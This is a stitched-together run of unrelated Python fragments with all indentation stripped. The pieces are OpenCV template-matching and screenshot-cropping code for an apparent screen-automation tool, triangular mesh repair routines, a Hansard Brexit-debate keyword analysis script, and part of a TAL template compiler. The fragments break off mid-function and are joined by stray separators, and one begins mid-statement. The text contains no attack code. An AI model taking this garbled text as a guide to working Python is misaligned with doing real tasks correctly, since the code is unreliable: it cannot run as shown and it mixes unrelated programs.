for (x, y) in zip(xloc, yloc):
# Twice to ensure singles are kept after picking unique cases
matches.append([int(x), int(y), int(width), int(height)])
matches.append([int(x), int(y), int(width), int(height)])
# Grouping function
matches, weights = cv2.groupRectangles(matches, 1, 0.2)
print("There are {0} unique matches in the haystack.".format(len(matches)))
# Display image with rectangle
for (x, y, width, height) in matches:
if (x, y, width, height) not in chars:
chars.append([int(x), int(y), int(width), int(height), str(chars_list[match_number]).lower()])
# cv2.rectangle(haystack, (x, y), (x + width, y + height), (255, 255, 0), 2)
# cv2.imshow('Haystack', haystack)
# cv2.waitKey()
# cv2.destroyAllWindows()
else:
print("There are no matches.")
self.image_index += 1
print("Found " + str(len(chars)) + " of numbers in " + haystack_filename)
match_number += 1
self.image_index = 1
else:
print("Characters do not exist in screenshot.")
print(chars)
return chars
def draw_info(self, matches, haystack_filename):
# Draw the matches on the original image
boxes = []
haystack = cv2.imread(self.imagedir + haystack_filename, cv2.IMREAD_UNCHANGED)
for (x, y, width, height, name) in matches:
if (x, y, width, height) not in boxes:
boxes.append([int(x), int(y), int(width), int(height)])
cv2.rectangle(haystack, (x, y), (x + width, y + height), (255, 255, 0), 2)
cv2.imshow('Haystack', haystack)
cv2.waitKey()
cv2.destroyAllWindows()
def object_search(self, object_name, threshold, haystack_filename):
# Keep track of all matches and identify unique cases
self.object_directory = os.path.join(self.imagedir, object_name)
objects = []
if os.path.exists(self.object_directory):
files = os.listdir(self.object_directory)
self.image_index = 1
haystack = cv2.imread(self.imagedir + haystack_filename, cv2.IMREAD_UNCHANGED)
grayscale_haystack = cv2.cvtColor(haystack, cv2.COLOR_BGR2GRAY)
for f in files:
if '.png' in f:
matches = []
image_path = os.path.join(self.object_directory, object_name+str(self.image_index)+'.png')
needle = cv2.imread(image_path, cv2.IMREAD_UNCHANGED)
grayscale_needle = cv2.cvtColor(needle, cv2.COLOR_BGR2GRAY)
result = cv2.matchTemplate(grayscale_haystack, grayscale_needle, cv2.TM_CCOEFF_NORMED)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
# Max location has the best match with max_val to be % accuracy
width = needle.shape[1]
height = needle.shape[0]
bottom_right = (max_loc[0] + width, max_loc[1] + height)
# Threshold is the % accuracy compared to original needle
yloc, xloc = np.where(result >= threshold)
if len(xloc) > 0:
print("There are {0} total matches in the haystack.".format(len(xloc)))
for (x, y) in zip(xloc, yloc):
# Twice to ensure singles are kept after picking unique cases
matches.append([int(x), int(y), int(width), int(height)])
matches.append([int(x), int(y), int(width), int(height)])
# Grouping function
matches, weights = cv2.groupRectangles(matches, 1, 0.2)
print("There are {0} unique matches in the haystack.".format(len(matches)))
# Display image with rectangle
for (x, y, width, height) in matches:
if (x, y, width, height) not in objects:
objects.append([int(x), int(y), int(width), int(height)])
cv2.rectangle(haystack, (x, y), (x + width, y + height), (255, 255, 0), 2)
# cv2.imshow('Haystack', haystack)
# cv2.waitKey()
# cv2.destroyAllWindows()
else:
print("There are no matches.")
self.image_index += 1
print("Found " + str(len(objects)) + " of " + object_name + " in " + haystack_filename)
else:
print("Object does not exist in image files.")
return objects
def pick_random(self, matches):
# Pick random element in the matches list
if len(matches) > 0:
rand = random.randrange(0, len(matches))
return matches[rand]
else:
return None
def center_pos(self, single_match):
# Return center x, y coordinates of a match
if single_match is not None:
left = int(single_match[0] + (single_match[2]*3/8))
right = int(single_match[0] + (single_match[2]*5/8))
top = int(single_match[1] + (single_match[3]*3/8))
bottom = int(single_match[1] + (single_match[3]*5/8))
randX = random.randrange(left, right)
randY = random.randrange(top, bottom)
return (randX, randY)
def on_move(self, x, y):
if self.running:
# Get mouse position
self.currentMouseX, self.currentMouseY = pyautogui.position()
mousedistance = ((self.currentMouseX - self.prevMouseX) + (self.currentMouseY - self.prevMouseY))
# Check to see mouse has moved far enough and also only goes at most every second
self.delta_time(False)
if mousedistance > 20 and self.deltaTime > 1:
# Set previous time
self.delta_time(True)
# Takes screenshot, crops it to specified size, and saves under object_directory
screenshot = pyautogui.screenshot()
image = cv2.cvtColor(np.array(screenshot), cv2.COLOR_RGB2BGR)
x = int(self.currentMouseX - (self.crop_size / 2))
y = int(self.currentMouseY - (self.crop_size / 2))
w = x+int(self.crop_size)
h = y+int(self.crop_size)
cropped_image = image[x:w, y:h]
# cv2.imshow('Cropped', cropped_image)
if platform == "linux" or platform == "linux2":
cv2.imwrite(self.object_directory+'/'+self.object_on_mouse+str(self.image_index)+'.png', cropped_image)
elif platform == "win32":
cv2.imwrite(self.object_directory+'\\'+self.object_on_mouse+str(self.image_index)+'.png', cropped_image)
self.image_index += 1
print('There are '+str(self.image_index)+' images of '+self.object_on_mouse)
# print('Mouse moved to {0}'.format((x, y)))
def delta_time(self, set_last):
# Calc delta time to save to macro
self.deltaTime = round((time.perf_counter()-self.lastTimestamp), 1)
if set_last:
self.lastTimestamp = round(time.perf_counter(), 3)
def on_click(self, x, y, button, pressed):
# Mouse press action
if self.running:
if pressed:
# Get mouse position
self.currentMouseX, self.currentMouseY = pyautogui.position()
print('Mouse '+str(button)+' {0} at {1}'.format('pressed' if pressed else 'released', (x, y)))
if not pressed:
# Stop listener
return False
def on_release(self, key):
# Watch an object
try:
if key.char == self.start_button and self.running:
self.running = False
print("Stopped watching {0}".format(self.object_on_mouse))
elif key.char == self.start_button:
print("What object are you showing me under the mouse cursor?")
# self.object_on_mouse = input()
print("How big is it?")
# Just crops box of this size | |
= [1,2,3,4,5,6]
for depth in depths:
self.max_depth = depth+1
bc = self.bad_cells()
print("Start of cell-nudge with search depth %d, bad_cell count %d "%(depth,len(bc)))
for bad_cell in bc:
self.nudge_cell_search(bad_cell,depth)
def full_go(self):
self.stats()
self.pass_one()
self.stats()
self.pass_two()
self.stats()
def try_to_fix_cell_structure(self,bad_cell,verbose=False):
"""
attempt to fix the angle constraints for this cell.
return true if we changed anything (such that bad cells
should be recomputed)
"""
# try to figure out what's going on with bad_cell:
verts = self.points[self.cells[bad_cell],:2]
angles = self.tri_angles( [bad_cell] )[0]
# optionally plot what's going on
if 0:
verts4 = concatenate( (verts,verts[:1]) )
plot(verts4[:,0],verts4[:,1],'r-o')
for i in range(3):
annotate( "%g"%(angles[i]*180/pi) , verts[i] )
axis('equal')
### Test 1: is it on the boundary?
## note: doesn't handle a triangle that is a corner of the boundary
bdry_points = [] # indices to points that are on the boundary:
for edge_i in self.cell2edges(bad_cell):
nbr = self.edges[edge_i,4]
if nbr == -1:
bdry_points.append( self.edges[edge_i,0] )
bdry_points.append( self.edges[edge_i,1] )
bdry_points = unique(bdry_points)
if verbose:
print("boundary points: ",bdry_points)
if len(bdry_points) == 2:
if verbose:
print("2 boundary points - dispatch to fix_boundary_cell")
return self.try_to_fix_boundary_cell(bad_cell,bdry_points,verbose)
### Test 2: is the node with the bad angle an internal node with
## 4 cells?
bad_node = self.cells[bad_cell,find(angles > self.max_angle)[0] ]
bad_nodes_cells = self.pnt2cells(bad_node)
total_angle = self.boundary_angle(bad_node)
if total_angle == 0.0 and len(bad_nodes_cells) == 4:
return self.try_to_fix_quad(bad_node,verbose)
return False # didn't fix anything
def try_to_fix_boundary_cell(self,bad_cell,bdry_points,verbose=False):
""" look for ways to fix a boundary cell with a bad angle.
"""
# right now we only know how to look for a boundary point on a straight
# edge that can then be removed
for bdry_point in bdry_points:
n_cells = len( self.pnt2cells(bdry_point) )
# compute the boundary angle at this point
angle = self.boundary_angle(bdry_point)
if verbose:
print("Angle at boundary point %i is %g"%(bdry_point,angle))
# is it a problem?
# if the interior angle is divided evenly amongst
# the current cells, how well do we do?
if (2*pi - angle) / n_cells > self.max_angle:
if verbose:
print("Yep, there are %d cells, interior angle %g, violates max angle"%(n_cells,360 - angle*180/pi))
# common case - the node is along a straight or nearly straight boundary
if abs(pi - angle) < 10*pi/180. and n_cells == 2:
# make sure we're not creating a 4-way cross
# first find the interior point common to our two cells
my_cells = list( self.pnt2cells(bdry_point) )
cellA = my_cells[0]
cellB = my_cells[1]
int_point = None
for p in self.cells[cellA]:
if p != bdry_point and p in self.cells[cellB]:
int_point = p
break
if int_point is None:
raise "Why can't I find the interior point common to these cells?"
n_cells_at_interior = len( self.pnt2cells(int_point) )
angle_at_interior = 2*pi - self.boundary_angle(int_point)
if angle_at_interior / (n_cells_at_interior-1) > self.max_angle:
if verbose:
print("Hmm - can't remove %d because it would leave too few cells for %d"%(bdry_point,int_point))
else:
if verbose:
print("Great - we should merge %d and %d, and remove node %d"%(cellA,cellB,bdry_point))
self.merge_cells(cellA,cellB,bdry_point)
self.boundary_cells_merged += 1
return True
else:
pass
# print "Boundary angle is bad, but it's not close enough to a straight line"
else:
# print "The boundary angle is not the problem"
pass
return False
def merge_cells(self,cellA,cellB,dead_node):
""" merge two cells that are on the border
"""
# the structures that have to be updated:
# cells, edges
# and invalidate these:
# _pnt2cells, _vcenters [ pnts2edge no longer ] , _pnt2edges
new_points = setdiff1d(ravel( self.cells[ [cellA,cellB] ] ), [dead_node])
if 0:
figure(1)
cla()
self.plot_cells([cellA,cellB])
# if there were information to copy over about the
# cells, this would be where, but I think all of the interesting
# stuff is in the edges.
cellA_edges = find( any(self.edges[:,3:]==cellA,axis=1) )
cellB_edges = find( any(self.edges[:,3:]==cellB,axis=1) )
common_edge = intersect1d(cellA_edges,cellB_edges)
dead_node_edges = self.pnt2edges(dead_node)
# rather than deleting the cells outright, maybe
# it's smarter to record how to fix their edges
# for each cell, one edge stays the same (but gets its
# cell neighbor updated to the new_cell_id).
# one edge is removed entirely, and one edge gets
# merged with the other triangle extra edge, to create
# a new edge. here it should take the
new_cell_id = cellA #
self.cells[new_cell_id,:] = new_points
# edges that used to point to cellB now point to cellA
self.edges[ self.edges[:,3]==cellB, 3 ] = new_cell_id
self.edges[ self.edges[:,4]==cellB, 4 ] = new_cell_id
# this should create one edge that now has new_cell_id on
# both sides, which is the edge we want to delete outright
dead_edge = find( all(self.edges[:,3:]==new_cell_id,axis=1) )[0]
edges_to_merge = setdiff1d( dead_node_edges, [dead_edge] )
self.edges[dead_edge,:] = -1
points_on_merge_edge = setdiff1d(ravel( self.edges[edges_to_merge,:2] ),[dead_node])
merged_edge = edges_to_merge[0]
raise Exception("This code needs to be updated - fix _pnt2edges!")
# good time to fix pnts2edge:
# remove the mappings for the two short edges:
for other_point in points_on_merge_edge:
nodes = (dead_node,other_point)
if nodes[0] > nodes[1]:
nodes = (other_point,dead_node)
del self.pnts2edge[nodes]
# make sure it's endpoints are set right, and
self.edges[merged_edge,:2] = points_on_merge_edge
# if self.edges[edges_to_merge[0],2] != self.edges[edges_to_merge[1],2]:
# print "Marker is different on these two edges... just guessing"
if points_on_merge_edge[0] > points_on_merge_edge[1]:
new_node_pair = (points_on_merge_edge[1],points_on_merge_edge[0])
else:
new_node_pair = (points_on_merge_edge[0],points_on_merge_edge[1])
self.pnts2edge[new_node_pair] = merged_edge
# mark the other edge as deleted
self.edges[edges_to_merge[1],:] = -1
# mark the other cell deleted:
self.delete_cell(cellB) # self.cells[cellB,:] = -1
# so what all has been invalidated at this point?
# _pnt2cells, _vcenters, pnts2edge
if self._pnt2cells:
del self._pnt2cells[dead_node]
for new_point in new_points:
set_of_cells = self._pnt2cells[new_point]
if cellB in set_of_cells:
set_of_cells.remove(cellB)
set_of_cells.add(cellA)
self._vcenters = None # lazy
# record that we changed stuff:
self.changed_cells.append(cellA)
self.changed_cells.append(cellB)
def plot_cells(self,c_list,nbr_count=0,label_nodes=True,label_cells=True,label_edges=False):
""" plot cell ids, vertex ids and edges for
the given cells.
if nbr_count is > 0, include cells that are up to
nbr_count cells away
"""
c_list = array(c_list)
while nbr_count > 0:
new_c_list = c_list
for cell in c_list:
new_c_list = concatenate([new_c_list,self.cell_neighbors(cell)])
c_list = unique(new_c_list)
nbr_count -= 1
ax = gca()
points = unique(ravel( self.cells[ c_list ] ))
plot(self.points[points,0],self.points[points,1],'ro')
if label_nodes:
for p in points:
annotate(str(p),self.points[p,:2])
# annotate centers of cells
vc = self.vcenters()
for c in c_list:
if 0: # enable if there are possible edge/cell discrepancies
nodes = self.cells[c,[0,1,2,0]]
plot(self.points[nodes,0],
self.points[nodes,1],'b-')
#ctr = mean(self.points[self.cells[c],:2],axis=0)
# use the voronoi center:
ctr = vc[c]
if label_cells:
annotate('c%i'%c,ctr)
# plot edges:
edge_list = array([],int32)
for c in c_list:
edge_list = concatenate( (edge_list,find(any(self.edges[:,3:]==c,axis=1))) )
for e in unique(edge_list):
if self.edges[e,4] < 0:
color = 'r'
lw = 2
else:
color = 'b'
lw = 1
nodes = self.points[ self.edges[e,:2],:2 ]
plot( nodes[:,0],nodes[:,1],color,lw=lw )
if label_edges:
annotate("%i"%e,mean(nodes,axis=0)[:2])
axis('equal')
def try_to_fix_quad(self,node,verbose=False):
""" group of four triangles around one point
merge pairs.
"""
# print "fix_quad"
# find the four outside vertices, in order (starting point
# doesn't matter)
# compute interior quad angle at each
# the pair (0,2) or (1,3) with smaller average angle
# define the endpoints (along with node) of the
# edges to be removed.
# get with it...
cells = list(self.pnt2cells(node))
if 0:
subplot(211)
cla()
self.plot_cells(cells)
cell_points_not_node = setdiff1d(ravel(self.cells[cells,:]),[node])
# print cell_points_not_node
deltas = self.points[cell_points_not_node,:2] - self.points[node,:2]
angles = arctan2(deltas[:,1],deltas[:,0])
quad_verts = cell_points_not_node[ argsort(angles) ]
quad_points = self.points[quad_verts,:2]
# now we have the outer four vertices in CCW order.
quad_angles = zeros( (4,), float64)
# plot( quad_points[ [0,1,2,3,0],0],
# quad_points[ [0,1,2,3,0],1] )
for i in range(4):
im1 = (i-1)%4
ip1 = (i+1)%4
delta_prev = quad_points[i] - quad_points[im1]
delta_next = quad_points[ip1] - quad_points[i]
angle_prev = arctan2(delta_prev[1],delta_prev[0])
angle_next = arctan2(delta_next[1],delta_next[0])
quad_angles[i] = (angle_prev+pi - angle_next) % (2*pi)
# print quad_points[i]
# annotate( "%g"%(quad_angles[i]*180/pi), quad_points[i] )
# now decide which way to merge:
# switch the order of quad_verts so that 0 and 2 are the points that
# define the merge axis
if (quad_angles[1]+quad_angles[3]) < (quad_angles[0] + quad_angles[2]):
quad_verts = quad_verts[ [1,2,3,0] ]
# print "Edges to be removed: %i-%i | |
# This script is for running the analysis that comes after the cross-entropy stuff.
import pandas as pd
import os
import sys
from datetime import datetime
import numpy as np
import sqlite3
import nltk
import regex as re
import spacy
import json
with open("../project-config.json") as config_file:
project_config = json.load(config_file)
DB_FP = project_config["DB_FP"]
MP_Group_FP = project_config["GROUPS_FP"]
with open(project_config["SPEAKER_FILE"]) as speaker_file:
speaker_list = json.load(speaker_file)
from helper_functions import clean_text, spacy_tokenise, get_contribution_windows, get_keywords_from_tokens, split_corpus
sql_get_all_posts ="""
SELECT c.uid, m.name, m.PimsId, p.party, d.date, c.body, c.topic, c.section, s.tmay_deal, s.benn_act, s.ref_stance, s.constituency_leave, c.usas_file
FROM contributions as c
INNER JOIN members as m
ON m.PimsId = c.member
INNER JOIN debates as d
ON d.uid = c.debate
INNER JOIN member_party as p
ON p.PimsId = m.PimsId
INNER JOIN member_stances as s
ON s.PimsId = m.PimsId
WHERE (d.date BETWEEN date("2015-05-01") AND date("2019-12-11"))
AND (((d.date BETWEEN p.start AND p.end) AND NOT (p.end IS NULL))
OR ((d.date >= p.start) AND (p.end IS NULL)));""".strip()
convert_to_date = lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S")
def check_dir(dir_name):
"""
Checks if a directory exists. Makes it if it doesn't.
"""
if not os.path.exists(dir_name):
os.makedirs(dir_name)
def tokenise(text):
"""
Turns given text into tokens.
"""
cleaned = clean_text(text)
cleaned = re.sub(r"(\p{P})\p{P}*", r"\1 ", cleaned)
tokens = spacy_tokenise(cleaned)
return tokens
def get_groups_toks_and_contribs(queries, gnames, all_contributions, all_toks, token_limit=60):
"""
Gets the provided groups and tokens given pandas queries.
"""
out_contribs = dict()
out_toks = dict()
for query, gname in zip(queries, gnames):
# Get contributions for each group.
curr = all_contributions.query(query)
# Get tokens for each group.
curr_toks = all_toks[all_toks.index.isin(curr.index)]
# Only keep tokens for contributions with >60 posts.
curr_toks = curr_toks[curr_toks.apply(len) >= token_limit].apply(lambda x: x[:token_limit])
# Get rid of contributions with <= 60 posts.
curr = curr[curr.index.isin(curr_toks.index)]
# Set output
out_contribs[gname] = curr
out_toks[gname] = curr_toks
# Create combined list of contributions
combined = pd.concat(list(out_contribs.values()), axis=0)
return out_contribs, out_toks, combined
if __name__ == "__main__":
# out_dir = input("Enter output directory:")
out_dir = "C:/Users/Eddie/Documents/Datasets/Hansard Output/Keywords/15K"
window_start = convert_to_date("2019-04-01 00:00:00")
window_end = convert_to_date("2019-09-03 00:00:00")
check_dir(out_dir)
token_limit = 60
queries = ["party == 'Conservative'", "party == 'Labour'"]
gnames = ["Conservative", "Labour"]
conn = sqlite3.connect(DB_FP)
curs = conn.cursor()
# Gets all the contributions and creates a nice dataframe
all_contributions = pd.read_sql_query(sql_get_all_posts, conn)
all_contributions.columns = ['uid', 'name', 'PimsId', 'party', 'date', 'text', 'topic', 'section', 'tmay_deal', 'benn_act', 'ref_stance', 'constituency_leave', 'usas_file']
all_contributions.set_index("uid", inplace=True)
all_contributions['date'] = all_contributions['date'].apply(convert_to_date)
all_contributions = all_contributions.query("PimsId not in @speaker_list")
all_contributions.sort_values("date", inplace=True)
# Tokenise the contributions
all_toks = all_contributions["text"].apply(tokenise)
# Only keep ones with >60 toks (and only keep first 60)
all_toks = all_toks[all_toks.apply(len) >= token_limit]
all_contributions = all_contributions.loc[all_toks.index]
# Get the EU and Non-EU mentions
eu_mentions, non_eu_mentions = split_corpus(all_contributions, "eu")
# Get tokens of EU-mentions
eu_toks = all_toks.loc[eu_mentions.index]
# Get tokens of Non-EU-mentions
non_eu_toks = all_toks.loc[non_eu_mentions.index]
# Get the non-EU Conservative and Labour groups
non_eu_group_contribs, non_eu_group_toks, non_eu_combined = get_groups_toks_and_contribs(queries, gnames, non_eu_mentions, all_toks, token_limit)
non_eu_combined_toks = all_toks.loc[non_eu_combined.index]
# Get the non-EU Conservative and Labour groups
eu_group_contribs, eu_group_toks, eu_combined = get_groups_toks_and_contribs(queries, gnames, eu_mentions, all_toks, token_limit)
eu_combined_toks = all_toks.loc[eu_combined.index]
################################################################################################################################
# KW of Remain-Constituency Remainers against Leavers at given window
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
leavers = in_window.query("ref_stance == 'leave'")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[leavers.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_against_leavers.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# KW of Remain-Constituency Remainers against Leave-Constituency Remainers at given window
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
l_con_remainers = in_window.query("constituency_leave > 50 and ref_stance == 'remain'")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[l_con_remainers.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_against_lcon_remainers.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# KW against all other contributions (not in the window)
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
others = eu_mentions.query("uid not in @in_window.index")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[others.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_everything_else.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# KW against global self
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
itself = eu_mentions.query("constituency_leave < 50 and ref_stance == 'remain'")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[itself.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_vs_global_self.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# EU KW for each group (against non-eu)
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
l_con_remainers = in_window.query("constituency_leave > 50 and ref_stance == 'remain'")
leavers = in_window.query("ref_stance == 'leave'")
non_eu = non_eu_mentions.query("date >= @window_start and date <= @window_end")
# Calculate the keywords
kw = dict()
kw["r_con_remainers"] = get_keywords_from_tokens(all_toks.loc[r_con_remainers.index], all_toks.loc[non_eu.index]).to_dict()
kw["l_con_remainers"] = get_keywords_from_tokens(all_toks.loc[l_con_remainers.index], all_toks.loc[non_eu.index]).to_dict()
kw["leavers"] = get_keywords_from_tokens(all_toks.loc[leavers.index], all_toks.loc[non_eu.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_against_non_eu.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# KW of local and global group against Non-EU, Globally
################################################################################################################################
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
# Get the groups
r_con_remainers_loc = in_window.query("constituency_leave < 50 and ref_stance == 'remain'")
r_con_remainers_glo = all_contributions.query("constituency_leave < 50 and ref_stance == 'remain'")
l_con_remainers = in_window.query("constituency_leave > 50 and ref_stance == 'remain'")
leavers = in_window.query("ref_stance == 'leave'")
# Calculate the keywords
kw = dict()
kw["local"] = get_keywords_from_tokens(all_toks.loc[r_con_remainers_loc.index], non_eu_toks).to_dict()
kw["global"] = get_keywords_from_tokens(all_toks.loc[r_con_remainers_glo.index], non_eu_toks).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "kw_against_non_eu_glob.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# Keywords of Leave/Remain in and around the dip of 2018
################################################################################################################################
window_1_start = convert_to_date("2017-11-15 00:00:00")
window_1_end = convert_to_date("2018-01-09 00:00:00")
window_2_start = convert_to_date("2018-01-09 00:00:00")
window_2_end = convert_to_date("2018-05-07 00:00:00")
# Get contributions from the window
in_1st_window = eu_mentions.query("date >= @window_1_start and date <= @window_1_end")
in_2nd_window = eu_mentions.query("date >= @window_2_start and date <= @window_2_end")
remain1 = in_1st_window.query("ref_stance == 'remain'")
leave1 = in_1st_window.query("ref_stance == 'leave'")
remain2 = in_2nd_window.query("ref_stance == 'remain'")
leave2 = in_2nd_window.query("ref_stance == 'leave'")
not_in_dip = eu_mentions.query("date < @window_1_start")
# Calculate the keywords
kw_dip = dict()
kw_dip["remain"] = get_keywords_from_tokens(all_toks.loc[remain1.index], all_toks.loc[not_in_dip.index]).to_dict()
kw_dip["leave"] = get_keywords_from_tokens(all_toks.loc[leave1.index], all_toks.loc[not_in_dip.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "2018_ref_dip_kw_v_before.json"), "w") as out_file:
json.dump(kw_dip, out_file)
# Calculate the keywords
kw_dip = dict()
kw_dip["remain"] = get_keywords_from_tokens(all_toks.loc[remain2.index], all_toks.loc[remain1.index]).to_dict()
kw_dip["leave"] = get_keywords_from_tokens(all_toks.loc[leave2.index], all_toks.loc[leave1.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "2018_ref_dip_kw_change.json"), "w") as out_file:
json.dump(kw_dip, out_file)
################################################################################################################################
# Keywords of Labour in their 2016 spike
################################################################################################################################
window_start = convert_to_date("2016-02-03 00:00:00")
window_end = convert_to_date("2016-06-29 00:00:00")
# Get contributions from the window
in_window = all_contributions.query("date >= @window_start and date <= @window_end")
lab = in_window.query("party == 'Labour'")
not_in_window = all_contributions.query("date < @window_start or date > @window_end")
# Calculate the keywords
kw = get_keywords_from_tokens(all_toks.loc[lab.index], all_toks.loc[not_in_window.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "labour_kw_peak.json"), "w") as out_file:
json.dump(kw, out_file)
################################################################################################################################
# EU Keywords of Lab/Con in their unpredictability dip of 2019
################################################################################################################################
window_1_start = convert_to_date("2019-02-20 00:00:00")
window_1_end = convert_to_date("2019-04-08 00:00:00")
window_2_start = convert_to_date("2019-04-08 00:00:00")
window_2_end = convert_to_date("2019-10-07 00:00:00")
# Get contributions from the window
in_1st_window = eu_mentions.query("date >= @window_1_start and date <= @window_1_end")
in_2nd_window = eu_mentions.query("date >= @window_2_start and date <= @window_2_end")
lab1 = in_1st_window.query("party == 'Labour'")
con1 = in_1st_window.query("party == 'Conservative'")
lab2 = in_2nd_window.query("party == 'Labour'")
con2 = in_2nd_window.query("party == 'Conservative'")
not_in_dip = eu_mentions.query("date < @window_1_start")
# Calculate the keywords
kw_dip = dict()
kw_dip["lab"] = get_keywords_from_tokens(all_toks.loc[lab1.index], all_toks.loc[not_in_dip.index]).to_dict()
kw_dip["con"] = get_keywords_from_tokens(all_toks.loc[con1.index], all_toks.loc[not_in_dip.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "2019_party_dip_kw_v_before.json"), "w") as out_file:
json.dump(kw_dip, out_file)
# Calculate the keywords
kw_dip = dict()
kw_dip["lab"] = get_keywords_from_tokens(all_toks.loc[lab2.index], all_toks.loc[lab1.index]).to_dict()
kw_dip["con"] = get_keywords_from_tokens(all_toks.loc[con2.index], all_toks.loc[con1.index]).to_dict()
# Save it to a file
with open(os.path.join(out_dir, "2019_party_dip_kw_change.json"), "w") as out_file:
json.dump(kw_dip, out_file)
################################################################################################################################
# Keywords of Leave/Remain in their 2018 change against previous windows.
################################################################################################################################
window_start = convert_to_date("2018-01-09 00:00:00")
window_end = convert_to_date("2018-05-17 00:00:00")
# Get contributions from the window
in_window = eu_mentions.query("date >= @window_start and date <= @window_end")
| |
')
if (len (attProps) < 2):
# Error, badly formed repeat command
msg = "Badly formed repeat command '%s'. Repeat commands must be of the form: 'localVariable path'" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
varName = attProps [0]
expression = " ".join (attProps[1:])
return (TAL_REPEAT, (varName, expression, self.endTagSymbol))
def compileCmdContent (self, argument, replaceFlag=0):
# Compile a content command, resulting argument is
# (replaceFlag, structureFlag, expression, endTagSymbol)
# Sanity check
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! content/replace commands must be of the form: 'path'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
structureFlag = 0
attProps = argument.split (' ')
if (len(attProps) > 1):
if (attProps[0] == "structure"):
structureFlag = 1
express = " ".join (attProps[1:])
elif (attProps[1] == "text"):
structureFlag = 0
express = " ".join (attProps[1:])
else:
# It's not a type selection after all - assume it's part of the path
express = argument
else:
express = argument
return (TAL_CONTENT, (replaceFlag, structureFlag, express, self.endTagSymbol))
def compileCmdReplace (self, argument):
return self.compileCmdContent (argument, replaceFlag=1)
def compileCmdAttributes (self, argument):
# Compile tal:attributes into attribute command
# Argument: [(attributeName, expression)]
# Break up the list of attribute settings first
commandArgs = []
# We only want to match semi-colons that are not escaped
argumentSplitter = re.compile ('(?<!;);(?!;)')
for attributeStmt in argumentSplitter.split (argument):
# remove any leading space and un-escape any semi-colons
attributeStmt = attributeStmt.lstrip().replace (';;', ';')
# Break each attributeStmt into name and expression
stmtBits = attributeStmt.split (' ')
if (len (stmtBits) < 2):
# Error, badly formed attributes command
msg = "Badly formed attributes command '%s'. Attributes commands must be of the form: 'name expression[;name expression]'" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
attName = stmtBits[0]
attExpr = " ".join (stmtBits[1:])
commandArgs.append ((attName, attExpr))
return (TAL_ATTRIBUTES, commandArgs)
def compileCmdOmitTag (self, argument):
# Compile a condition command, resulting argument is:
# path
# If no argument is given then set the path to default
if (len (argument) == 0):
expression = "default"
else:
expression = argument
return (TAL_OMITTAG, expression)
# METAL compilation commands go here
def compileMetalUseMacro (self, argument):
# Sanity check
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! use-macro commands must be of the form: 'use-macro: path'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
cmnd = (METAL_USE_MACRO, (argument, {}, self.endTagSymbol))
self.log.debug ("Returning METAL_USE_MACRO: %s" % str (cmnd))
return cmnd
def compileMetalDefineMacro (self, argument):
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! define-macro commands must be of the form: 'define-macro: name'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Check that the name of the macro is valid
if (METAL_NAME_REGEX.match (argument).end() != len (argument)):
msg = "Macro name %s is invalid." % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
if (argument in self.macroMap):
msg = "Macro name %s is already defined!" % argument
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# The macro starts at the next command.
macro = SubTemplate (len (self.commandList), self.endTagSymbol)
self.macroMap [argument] = macro
return None
def compileMetalFillSlot (self, argument):
if (len (argument) == 0):
# No argument passed
msg = "No argument passed! fill-slot commands must be of the form: 'fill-slot: name'"
self.log.error (msg)
raise TemplateParseException (self.tagAsText (self.currentStartTag), msg)
# Check that the name of the macro is valid
if (METAL_NAME_REGEX.match (argument).end() != len (argument)):
msg = "Slot name %s is invalid." % argument
self.log.error (msg)
